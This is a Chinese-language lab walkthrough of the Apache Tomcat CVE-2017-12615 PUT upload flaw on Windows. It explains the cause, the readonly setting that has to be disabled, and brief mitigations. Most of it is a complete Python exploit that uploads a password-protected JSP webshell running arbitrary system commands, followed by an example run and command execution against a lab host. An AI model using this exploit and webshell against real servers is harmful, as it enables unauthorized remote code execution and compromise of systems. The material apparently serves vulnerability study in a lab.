Tomcat的Servlet是在conf/web.xml配置的,通过配置文件可知,当后缀名为.jsp和.jspx的时候是通过JspServlet处理请求的,而其他的精通文件是通过DefaultServlet处理的可以得知:"1.jsp "(末尾有一个空格)并不能匹配到JspServlet,而是会交由DefaultServlet去处理当处理PUT请求时:会调用resources.bind:dirContext为FileDirContext:调用rebind创建文件又由于windows不允许" "(空格)作为文件名结尾,所以会创建一个".jsp"文件,导致代码执行
漏洞靶机 Win 2003x64 :192.168.136.136
PC主机(Python环境) :192.168.1.103
漏洞存在范围:Tomcat-7.0.0-Tomcat-7.0.81
win 2003x64 安装 JAVA环境
Tomcat7.0.75下载:http://archive.Apache.org/dist/tomcat/tomcat-7/v7.0.75/bin/apache-tomcat-7.0.75.exe
找到Tomcat的安装目录下的conf的web.xml
readonly Is this context "read only", so HTTP
commands like PUT and DELETE are
rejected? [true]
这个意思就是说:当前是只读模式,是不允许修改的
找到org.apache.catalina.servlets.DefaultServlet方法:
添加如下代码并保存:
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
修改完之后,重启Tomcat:
Python EXP:
#! -*- coding:utf-8 -*-
import httplib
import sys
import time
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.Append(temp
+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("hacker".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println("Test By Power_Liu");}%>'''
try:
conn = httplib.HTTPConnection(sys.argv[1])
conn.request(method='OPTIONS', url='/ffffzz')
headers = dict(conn.getresponse().getheaders())
if 'allow' in headers and
headers['allow'].find('PUT') > 0 :
conn.close()
conn = httplib.HTTPConnection(sys.argv[1])
url = "/" + str(int(time.time()))+'.jsp/'
#url = "/" + str(int(time.time()))+'.jsp::$DATA'
conn.request( method='PUT', url= url, body=body)
res = conn.getresponse()
if res.status == 201 :
#print 'shell:', 'http://' + sys.argv[1] + url[:-7]
print 'shell:', 'http://' + sys.argv[1] + url[:-1]
elif res.status == 204 :
print 'file exists'
else:
print 'error'
conn.close()
else:
print 'Server not vulnerable'
except Exception,e:
print 'Error:', e
运行Python-EXP脚本:
python2 tomcat-CVE-2017-12615.py 192.168.136.136:8080
得到的shell:http://192.168.136.136:8080/1574766773.jsp
得到一枚Webshell:
访问:http://192.168.136.136:8080/1574766773.jsp?pwd=hacker&cmd=ipconfig
将Tomcat更新到该漏洞被修复的版本(例如:Tomcat:8.5.23)readonlyinit-param不应该将false首先设置。如果该参数保留到默认(true),则攻击者无法上传文件。最后可以在前端安装WAF等防护软件来阻止PUT和DELETE请求。